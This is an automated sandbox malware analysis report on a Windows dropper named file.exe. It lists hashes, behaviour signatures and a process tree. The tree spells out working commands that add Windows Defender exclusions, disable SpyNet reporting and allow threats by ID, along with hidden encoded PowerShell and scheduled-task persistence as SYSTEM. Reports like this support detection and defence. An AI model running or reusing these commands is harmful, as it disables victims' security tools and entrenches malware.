Analysis
-
max time kernel
138s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20231127-en -
resource tags
-
submitted
07-12-2023 17:28
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
0faa4d38e65ff7e0f1e8134efa1895cf
-
SHA1
3a6acf2ca9b32c2db7d7cc57becf0f1a78865e18
-
SHA256
b1522b1aa5051f824a40e3ef61466b52a7bb5ba84572f3c581990b08b2155e6b
-
SHA512
b55e479d6b078038b2e1ba768ee4a934d4c7d7fc85e0c56e0dc1f682828d7a80618462b0663d7cd3b11cb3b3c36ead638415baaa83cedb0812502ca7c4a802a3
-
SSDEEP
196608:91OnB0vWiQDyndQdhiuIhU535GPCLsTzoNL:3On+OiQDyn6i9hU535Vw3oNL
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 29 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 48 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS4428.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS491A.tmp\Install.exe.\Install.exe /GnXjwdidG "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLkGVKtmh" /SC once /ST 13:34:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLkGVKtmh"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLkGVKtmh"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bQrKcOXclPyMmQgfTY" /SC once /ST 17:29:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\muGFCGu.exe\" BX /rzsite_idiAO 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\muGFCGu.exeC:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\xtiGjqqlqnODuBu\muGFCGu.exe BX /rzsite_idiAO 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PhaWElAePoHhBdUTFeR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bJazgiTXFJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bJazgiTXFJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icEyDogKU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\icEyDogKU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycMZCyUlVfbU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ycMZCyUlVfbU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yczsUHdtPuMxC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yczsUHdtPuMxC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sUklQelueKqzsVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\sUklQelueKqzsVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\szdKxxrFMiVXCdXj\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\szdKxxrFMiVXCdXj\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PhaWElAePoHhBdUTFeR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bJazgiTXFJUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\icEyDogKU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ycMZCyUlVfbU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yczsUHdtPuMxC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sUklQelueKqzsVVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\sUklQelueKqzsVVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HwCJYAoGHZGEGAfxF /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\szdKxxrFMiVXCdXj /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\szdKxxrFMiVXCdXj /t REG_DWORD /d 0 /reg:643⤵
-
